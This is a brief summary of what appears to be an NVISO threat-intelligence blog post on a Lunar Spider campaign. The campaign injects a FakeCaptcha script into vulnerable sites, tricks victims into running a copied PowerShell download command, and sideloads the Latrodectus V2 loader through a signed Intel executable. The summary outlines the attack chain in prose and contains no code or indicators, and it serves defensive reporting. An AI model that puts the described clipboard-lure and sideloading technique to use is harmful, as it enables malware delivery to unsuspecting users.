Lunar Spider Expands their Web via FakeCaptcha

NVISO documents an active Lunar Spider campaign delivering the Latrodectus V2 loader by exploiting CORS-vulnerable websites and injecting a FakeCaptcha (TeleCaptcha) JavaScript that copies a PowerShell download command to victims; the installer deploys a signed Intel EXE which sideloads a malicious DLL, enabling C2 communication, enumeration, and providing access for ransomware affiliates. The blog provides detailed technical analysis, IoCs (domains and SHA-256 hashes), code snippets, and hunting/detection queries (URLScan, KQL) mapped to MITRE ATT&CK.